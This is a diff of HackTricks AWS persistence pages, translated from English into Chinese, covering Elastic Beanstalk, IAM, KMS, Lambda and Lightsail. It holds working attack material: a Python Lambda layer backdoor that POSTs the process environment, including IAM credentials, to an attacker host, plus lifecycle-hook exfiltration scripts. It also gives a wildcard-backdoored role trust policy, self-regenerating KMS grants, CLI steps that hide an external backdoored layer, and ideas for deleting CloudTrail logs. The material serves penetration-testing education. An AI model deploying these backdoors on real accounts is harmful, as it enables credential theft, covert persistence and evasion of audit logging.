a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md index c55e0e2ba..ac6bc142e 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md @@ -4,31 +4,30 @@ ## Elastic Beanstalk -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md {{#endref}} -### Persistence in Instance +### 实例中的持久性 -In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**. +为了在 AWS 账户中保持持久性,可以在实例内部引入一些 **持久性机制**(cron 作业,ssh 密钥...),以便攻击者能够访问并从元数据服务中窃取 IAM 角色 **凭证**。 -### Backdoor in Version +### 版本中的后门 -An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code. +攻击者可以在 S3 仓库中植入后门代码,以便它始终执行其后门和预期代码。 -### New backdoored version +### 新的植入后门版本 -Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application. +攻击者可以部署一个新的植入后门的应用程序版本,而不是更改实际版本中的代码。 -### Abusing Custom Resource Lifecycle Hooks +### 滥用自定义资源生命周期钩子 > [!NOTE] -> TODO: Test - -Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**. +> TODO: 测试 +Elastic Beanstalk 提供生命周期钩子,允许您在实例配置和终止期间运行自定义脚本。攻击者可以 **配置生命周期钩子以定期执行一个脚本,提取数据或保持对 AWS 账户的访问**。 ```bash bashCopy code# Attacker creates a script that exfiltrates data and maintains access echo '#!/bin/bash @@ -42,40 +41,35 @@ aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hoo # Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook echo 'Resources: - AWSEBAutoScalingGroup: - Metadata: - AWS::ElasticBeanstalk::Ext: - TriggerConfiguration: - triggers: - - name: stealthy-lifecycle-hook - events: - - "autoscaling:EC2_INSTANCE_LAUNCH" - - "autoscaling:EC2_INSTANCE_TERMINATE" - target: - ref: "AWS::ElasticBeanstalk::Environment" - arn: - Fn::GetAtt: - - "AWS::ElasticBeanstalk::Environment" - - "Arn" - stealthyLifecycleHook: - Type: AWS::AutoScaling::LifecycleHook - Properties: - AutoScalingGroupName: - Ref: AWSEBAutoScalingGroup - LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING - NotificationTargetARN: - Ref: stealthy-lifecycle-hook - RoleARN: - Fn::GetAtt: - - AWSEBAutoScalingGroup - - Arn' > stealthy_lifecycle_hook.yaml +AWSEBAutoScalingGroup: +Metadata: +AWS::ElasticBeanstalk::Ext: +TriggerConfiguration: +triggers: +- name: stealthy-lifecycle-hook +events: +- "autoscaling:EC2_INSTANCE_LAUNCH" +- "autoscaling:EC2_INSTANCE_TERMINATE" +target: +ref: "AWS::ElasticBeanstalk::Environment" +arn: +Fn::GetAtt: +- "AWS::ElasticBeanstalk::Environment" +- "Arn" +stealthyLifecycleHook: +Type: AWS::AutoScaling::LifecycleHook +Properties: +AutoScalingGroupName: +Ref: AWSEBAutoScalingGroup +LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING +NotificationTargetARN: +Ref: stealthy-lifecycle-hook +RoleARN: +Fn::GetAtt: +- AWSEBAutoScalingGroup +- Arn' > stealthy_lifecycle_hook.yaml # Attacker applies the new environment configuration aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml" ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md index e3e1944e7..dbd67c1a0 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md @@ -1,53 +1,47 @@ -# AWS - IAM Persistence +# AWS - IAM 持久性 {{#include ../../../banners/hacktricks-training.md}} ## IAM -For more information access: +有关更多信息,请访问: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} -### Common IAM Persistence +### 常见的 IAM 持久性 -- Create a user -- Add a controlled user to a privileged group -- Create access keys (of the new user or of all users) -- Grant extra permissions to controlled users/groups (attached policies or inline policies) -- Disable MFA / Add you own MFA device -- Create a Role Chain Juggling situation (more on this below in STS persistence) +- 创建用户 +- 将受控用户添加到特权组 +- 创建访问密钥(新用户或所有用户的访问密钥) +- 授予受控用户/组额外权限(附加策略或内联策略) +- 禁用 MFA / 添加您自己的 MFA 设备 +- 创建角色链 juggling 情况(有关更多信息,请参见下面的 STS 持久性) -### Backdoor Role Trust Policies - -You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone): +### 后门角色信任策略 +您可以后门信任策略,以便能够假设它用于由您控制的外部资源(或对所有人): ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": ["*", "arn:aws:iam::123213123123:root"] - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": ["*", "arn:aws:iam::123213123123:root"] +}, +"Action": "sts:AssumeRole" +} +] } ``` +### 后门策略版本 -### Backdoor Policy Version +将管理员权限授予一个不是最后版本的策略(最后版本应该看起来合法),然后将该版本的策略分配给一个受控用户/组。 -Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group. +### 后门 / 创建身份提供者 -### Backdoor / Create Identity Provider - -If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them. +如果账户已经信任一个常见的身份提供者(如Github),则可以增加信任的条件,以便攻击者可以利用它们。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md index 7aefbd410..b8bdf0792 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md @@ -1,43 +1,37 @@ -# AWS - KMS Persistence +# AWS - KMS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## KMS -For mor information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-kms-enum.md {{#endref}} -### Grant acces via KMS policies +### 通过 KMS 策略授予访问权限 -An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information. +攻击者可以使用权限 **`kms:PutKeyPolicy`** 来 **授予访问** 一个密钥给他控制的用户或甚至是一个外部账户。有关更多信息,请查看 [**KMS 权限提升页面**](../aws-privilege-escalation/aws-kms-privesc.md)。 -### Eternal Grant +### 永久授权 -Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key. +授权是另一种方式,可以让主体对特定密钥拥有一些权限。可以授予一个授权,允许用户创建授权。此外,用户可以对同一个密钥拥有多个授权(甚至是相同的)。 -Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated. - -(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant) +因此,用户可以拥有 10 个具有所有权限的授权。攻击者应该不断监控这一点。如果在某个时刻 1 个授权被移除,应该生成另外 10 个授权。 +(我们使用 10 而不是 2,以便能够检测到一个授权被移除,而用户仍然拥有一些授权) ```bash # To generate grants, generate 10 like this one aws kms create-grant \ - --key-id \ - --grantee-principal \ - --operations "CreateGrant" "Decrypt" +--key-id \ +--grantee-principal \ +--operations "CreateGrant" "Decrypt" # To monitor grants aws kms list-grants --key-id ``` - > [!NOTE] -> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) +> 授予只能从此处授予权限: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md index 1390c2d55..d2b82e30b 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md @@ -4,7 +4,7 @@ ## Lambda -For more information check: +有关更多信息,请查看: {{#ref}} ../../aws-services/aws-lambda-enum.md @@ -12,7 +12,7 @@ For more information check: ### Lambda Layer Persistence -It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way: +可以**引入/后门一个层以在隐秘的方式下执行任意代码**,当lambda被执行时: {{#ref}} aws-lambda-layers-persistence.md @@ -20,49 +20,45 @@ aws-lambda-layers-persistence.md ### Lambda Extension Persistence -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. +利用Lambda Layers,也可以利用扩展并在lambda中持久化,同时窃取和修改请求。 {{#ref}} aws-abusing-lambda-extensions.md {{#endref}} -### Via resource policies +### 通过资源策略 -It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts: +可以授予外部账户对不同lambda操作(如调用或更新代码)的访问权限:
-### Versions, Aliases & Weights +### 版本、别名和权重 -A Lambda can have **different versions** (with different code each version).\ -Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\ -This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth. +一个Lambda可以有**不同的版本**(每个版本有不同的代码)。\ +然后,您可以创建**不同版本的不同别名**并为每个设置不同的权重。\ +这样,攻击者可以创建一个**后门版本1**和一个**仅包含合法代码的版本2**,并**仅在1%的请求中执行版本1**以保持隐秘。
-### Version Backdoor + API Gateway +### 版本后门 + API Gateway -1. Copy the original code of the Lambda -2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST - 1. Call the API gateway related to the lambda to execute the code -3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST. - 1. This will hide the backdoored code in a previous version -4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1` - 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario). -5. Select the POST method created and in Actions select **`Deploy API`** -6. Now, when you **call the function via POST your Backdoor** will be invoked +1. 复制Lambda的原始代码 +2. **创建一个新的版本,后门化**原始代码(或仅包含恶意代码)。发布并**将该版本部署**到$LATEST +1. 调用与lambda相关的API网关以执行代码 +3. **创建一个包含原始代码的新版本**,发布并将该**版本**部署到$LATEST。 +1. 这将隐藏之前版本中的后门代码 +4. 转到API Gateway并**创建一个新的POST方法**(或选择任何其他方法),该方法将执行lambda的后门版本:`arn:aws:lambda:us-east-1::function::1` +1. 注意arn的最后部分:1 **指示函数的版本**(在此场景中,版本1将是后门版本)。 +5. 选择创建的POST方法,在操作中选择**`部署API`** +6. 现在,当您**通过POST调用函数时,您的后门**将被调用 ### Cron/Event actuator -The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\ -Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**. +您可以使**lambda函数在某些事件发生或经过一段时间后运行**,这使得lambda成为获得持久性和避免检测的良好且常见的方法。\ +在这里,您有一些想法,可以通过创建lambdas使您的**AWS存在更加隐秘**。 -- Every time a new user is created lambda generates a new user key and send it to the attacker. -- Every time a new role is created lambda gives assume role permissions to compromised users. -- Every time new cloudtrail logs are generated, delete/alter them +- 每当创建新用户时,lambda生成一个新用户密钥并将其发送给攻击者。 +- 每当创建新角色时,lambda授予被攻陷用户假设角色的权限。 +- 每当生成新的cloudtrail日志时,删除/更改它们。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md index 71655ada0..5bcb6d4df 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md @@ -1,46 +1,42 @@ -# AWS - Abusing Lambda Extensions +# AWS - 滥用 Lambda 扩展 {{#include ../../../../banners/hacktricks-training.md}} -## Lambda Extensions +## Lambda 扩展 -Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. +Lambda 扩展通过与各种 **监控、可观察性、安全和治理工具** 集成来增强功能。这些扩展通过 [.zip 压缩包使用 Lambda 层](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) 添加,或包含在 [容器镜像部署中](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/),以两种模式运行:**内部** 和 **外部**。 -- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. +- **内部扩展** 与运行时进程合并,使用 **特定语言的环境变量** 和 **包装脚本** 操作其启动。此自定义适用于多种运行时,包括 **Java Correto 8 和 11、Node.js 10 和 12,以及 .NET Core 3.1**。 +- **外部扩展** 作为单独的进程运行,与 Lambda 函数的生命周期保持操作对齐。它们与多种运行时兼容,如 **Node.js 10 和 12、Python 3.7 和 3.8、Ruby 2.5 和 2.7、Java Corretto 8 和 11、.NET Core 3.1** 以及 **自定义运行时**。 -For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). +有关 [**Lambda 扩展如何工作的更多信息,请查看文档**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html)。 -### External Extension for Persistence, Stealing Requests & modifying Requests +### 持久性、窃取请求和修改请求的外部扩展 -This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) +这是本文中提出的技术摘要:[https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) -It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapid’s heap memory, by design.** +发现 Lambda 运行环境中的默认 Linux 内核是使用 “**process_vm_readv**” 和 “**process_vm_writev**” 系统调用编译的。所有进程都以相同的用户 ID 运行,即使是为外部扩展创建的新进程。**这意味着外部扩展可以完全读写 Rapid 的堆内存,这是设计使然。** -Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request. +此外,虽然 Lambda 扩展有能力 **订阅调用事件**,但 AWS 不会向这些扩展透露原始数据。这确保了 **扩展无法访问通过 HTTP 请求传输的敏感信息**。 -The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid. +Init (Rapid) 进程在 [http://127.0.0.1:9001](http://127.0.0.1:9001/) 监控所有 API 请求,而 Lambda 扩展在执行任何运行时代码之前初始化并运行,但在 Rapid 之后。

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png

-The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions. +变量 **`AWS_LAMBDA_RUNTIME_API`** 指示 **IP** 地址和 **端口** 号,以便 **子运行时进程** 和其他扩展使用。 > [!WARNING] -> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number. +> 通过将 **`AWS_LAMBDA_RUNTIME_API`** 环境变量更改为我们可以访问的 **`port`**,可以拦截 Lambda 运行时内的所有操作(**中间人攻击**)。这是可能的,因为扩展与 Rapid Init 具有相同的权限,并且系统内核允许 **修改进程内存**,从而能够更改端口号。 -Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment. +因为 **扩展在任何运行时代码之前运行**,修改环境变量将影响运行时进程(例如,Python、Java、Node、Ruby)在启动时的行为。此外,**在我们之后加载的扩展**,依赖于此变量,也将通过我们的扩展进行路由。此设置可能使恶意软件完全绕过安全措施或直接在运行时环境中记录扩展。

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png

-The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**. +工具 [**lambda-spy**](https://github.com/clearvector/lambda-spy) 被创建用于执行 **内存写入** 和 **窃取敏感信息**,从 lambda 请求、其他 **扩展** **请求** 甚至 **修改它们**。 -## References +## 参考文献 - [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) - [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md index f8a5e2868..af5a1d01b 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md @@ -4,79 +4,72 @@ ## Lambda Layers -A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files. +Lambda 层是一个 .zip 文件归档,**可以包含额外的代码**或其他内容。一个层可以包含库、[自定义运行时](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html)、数据或配置文件。 -It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment. +每个函数最多可以包含 **五个层**。当你在一个函数中包含一个层时,**内容会被提取到执行环境中的 `/opt`** 目录。 -By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version. +**默认情况下**,你创建的 **层** 对你的 AWS 账户是 **私有** 的。你可以选择 **与其他账户共享** 一个层或 **将** 该层 **公开**。如果你的函数使用了其他账户发布的层,即使该层被删除或你被撤销访问权限,你的函数仍然可以 **继续使用该层版本**。但是,你不能使用已删除的层版本创建新函数或更新函数。 -Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image. +作为容器镜像部署的函数不使用层。相反,当你构建镜像时,你将所需的运行时、库和其他依赖项打包到容器镜像中。 ### Python load path -The load path that Python will use in lambda is the following: - +Python 在 lambda 中使用的加载路径如下: ``` ['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages'] ``` - -Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`** +检查 **第二** 和 **第三** **位置** 是否被 **lambda layers** 解压其文件的目录占用: **`/opt/python/lib/python3.9/site-packages`** 和 **`/opt/python`** > [!CAUTION] -> If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation. +> 如果攻击者设法 **后门** 一个被使用的 lambda **layer** 或 **添加一个** 在加载常用库时会 **执行任意代码** 的层,他将能够在每次 lambda 调用时执行恶意代码。 -Therefore, the requisites are: +因此,要求是: -- **Check libraries** that are **loaded** by the victims code -- Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library. +- **检查库** 这些库是 **被受害者代码加载的** +- 创建一个 **带有 lambda layers 的代理库**,该库将 **执行自定义代码** 并 **加载原始** 库。 -### Preloaded libraries +### 预加载的库 > [!WARNING] -> When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\ -> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed. - -With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda: +> 在滥用此技术时,我发现了一个困难:一些库在你的代码执行时已经在 python 运行时中 **被加载**。我原本期待找到像 `os` 或 `sys` 这样的东西,但 **甚至 `json` 库也被加载**。\ +> 为了滥用这种持久性技术,代码需要 **加载一个在代码执行时未加载的新库**。 +使用这样的 python 代码,可以获得 **在 lambda 中预加载的库列表**: ```python import sys def lambda_handler(event, context): - return { - 'statusCode': 200, - 'body': str(sys.modules.keys()) - } +return { +'statusCode': 200, +'body': str(sys.modules.keys()) +} ``` - -And this is the **list** (check that libraries like `os` or `json` are already there) - +这是**列表**(检查像`os`或`json`这样的库是否已经存在) ``` 'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function' ``` +这是**lambda 默认包含的库**列表:[https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3) -And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3) +### Lambda Layer 后门 -### Lambda Layer Backdooring +在这个例子中,假设目标代码正在导入 **`csv`**。我们将对 **`csv` 库的导入进行后门处理**。 -In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**. +为此,我们将创建目录 **csv**,并在其中放置文件 **`__init__.py`**,路径为 lambda 加载的路径:**`/opt/python/lib/python3.9/site-packages`**\ +然后,当 lambda 执行并尝试加载 **csv** 时,我们的 **`__init__.py` 文件将被加载并执行**。\ +该文件必须: -For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\ -Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\ -This file must: - -- Execute our payload -- Load the original csv library - -We can do both with: +- 执行我们的有效载荷 +- 加载原始的 csv 库 +我们可以通过以下方式同时完成这两项: ```python import sys from urllib import request with open("/proc/self/environ", "rb") as file: - url= "https://attacker13123344.com/" #Change this to your server - req = request.Request(url, data=file.read(), method="POST") - response = request.urlopen(req) +url= "https://attacker13123344.com/" #Change this to your server +req = request.Request(url, data=file.read(), method="POST") +response = request.urlopen(req) # Remove backdoor directory from path to load original library del_path_dir = "/".join(__file__.split("/")[:-2]) @@ -90,29 +83,27 @@ import csv as _csv sys.modules["csv"] = _csv ``` +然后,创建一个 zip 文件,包含此代码,路径为 **`python/lib/python3.9/site-packages/__init__.py`**,并将其添加为 lambda 层。 -Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer. +您可以在 [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor) 找到此代码。 -You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor) - -The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated: +集成的有效载荷将在 **首次调用或在 lambda 容器重置后**(代码更改或冷 lambda)**发送 IAM 凭证到服务器**,但 **其他技术**(如以下内容)也可以集成: {{#ref}} ../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md {{#endref}} -### External Layers +### 外部层 -Note that it's possible to use **lambda layers from external accounts**. Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\ -Also note that the **max number of layers a lambda can have is 5**. +请注意,可以使用 **来自外部账户的 lambda 层**。此外,即使没有权限,lambda 也可以使用来自外部账户的层。\ +还要注意,**一个 lambda 最多可以有 5 个层**。 -Therefore, in order to improve the versatility of this technique an attacker could: - -- Backdoor an existing layer of the user (nothing is external) -- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**. - - The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda) - - The victim **won't see external layers** used with **`aws lambda list-layers`** +因此,为了提高此技术的灵活性,攻击者可以: +- 在用户的现有层中植入后门(没有任何外部内容) +- **在他的账户中创建**一个**层**,给予**受害者账户使用**该层的权限,**配置**受害者的 Lambda 中的**层**并**移除权限**。 +- **Lambda** 仍然能够**使用该层**,而**受害者**将没有任何简单的方法来**下载层代码**(除了在 lambda 内部获取反向 shell) +- 受害者**不会看到**使用 **`aws lambda list-layers`** 的外部层 ```bash # Upload backdoor layer aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" @@ -126,9 +117,4 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen # Remove permissions aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md index 88b0d082a..03372a14f 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md @@ -4,34 +4,30 @@ ## Lightsail -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-lightsail-enum.md {{#endref}} -### Download Instance SSH keys & DB passwords +### 下载实例 SSH 密钥和数据库密码 -They won't be changed probably so just having them is a good option for persistence +它们可能不会被更改,因此拥有它们是持久性的一个好选择 -### Backdoor Instances +### 后门实例 -An attacker could get access to the instances and backdoor them: 